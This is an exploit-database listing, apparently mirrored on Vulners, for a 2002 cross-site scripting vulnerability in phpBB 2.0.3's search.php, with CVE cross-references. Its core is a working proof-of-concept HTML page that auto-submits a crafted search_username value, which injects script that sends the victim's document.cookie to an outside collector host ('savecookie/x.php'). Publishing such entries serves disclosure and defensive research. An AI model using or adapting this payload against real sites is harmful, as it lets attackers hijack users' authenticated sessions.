Lucene search
+L

phpBB 2.0.3 - 'search.php' Cross-Site Scripting

🗓️ 03 Dec 2002 00:00:00Reported by f_a_aType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

phpBB 2.0.3 contains cross-site scripting vulnerability in search.php script due to input sanitization issues.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2002-2255
14 Oct 200720:00
cve
Cvelist
CVE-2002-2255
14 Oct 200720:00
cvelist
EUVD
EUVD-2002-2234
7 Oct 202500:30
euvd
NVD
CVE-2002-2255
31 Dec 200205:00
nvd
source: https://www.securityfocus.com/bid/6311/info

phpBB is vulnerable to cross site scripting attacks. This is due to insufficient santization of user-supplied input. The problem is located in the search.php script. This issue may be exploited by an attacker to steal a legitimate users cookie-based authentication credentials.

<html>
<body>
<form method="post" name="search"
action="http://target/search.php?mode=searchuser">
<input type="hidden" name="search_username" value=""/>

</form>
<SCRIPT>
search.search_username.value='Http://savecookie/x.php?Cookie="><script>location=search.search_username.value+document.cookie;</script\>';
document.search.submit();
</script>
</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Oct 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.01436
26